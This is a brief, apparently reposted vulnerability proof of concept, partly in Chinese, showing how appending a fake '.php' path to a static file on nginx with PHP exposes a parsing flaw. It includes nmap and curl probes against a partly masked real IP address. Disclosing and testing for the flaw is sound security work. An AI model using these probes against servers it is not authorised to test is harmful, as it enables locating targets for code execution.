Please Check your server.
Poc:
访问 http://testsite/robots.txtHTTP/1.1 200 OK
Server: nginx/0.6.32Date: Thu, 20 May 2010 10:05:30 GMTContent-Type: text/plainContent-Length: 18Last-Modified: Thu, 20 May 2010 06:26:34 GMTConnection: keep-aliveKeep-Alive: timeout=20Accept-Ranges: bytes
访问 http://testsite/robots.txt/80sec.php
HTTP/1.1 200 OK
Server: nginx/0.6.32Date: Thu, 20 May 2010 10:06:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20X-Powered-By: PHP/5.2.6
其中的Content-Type的变化说明了后端负责解析的变化,该站点就可能存在漏洞。
演示:
pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205
Interesting ports on 218.xx.xx.205:
PORT STATE SERVICE VERSION80/tcp open http nginx web server 0.8.15pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png -# | grep “Content-Type”
0.0%Content-Type: image/pngpentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png/test.php -# | grep “Content-Type”Content-Type: text/html
Reference:
[1]http://hi.baidu.com/yuange1975/blog/item/4c223031a6727eaf5edf0e46.html[2]http://www.laruence.com/2010/05/20/1495.html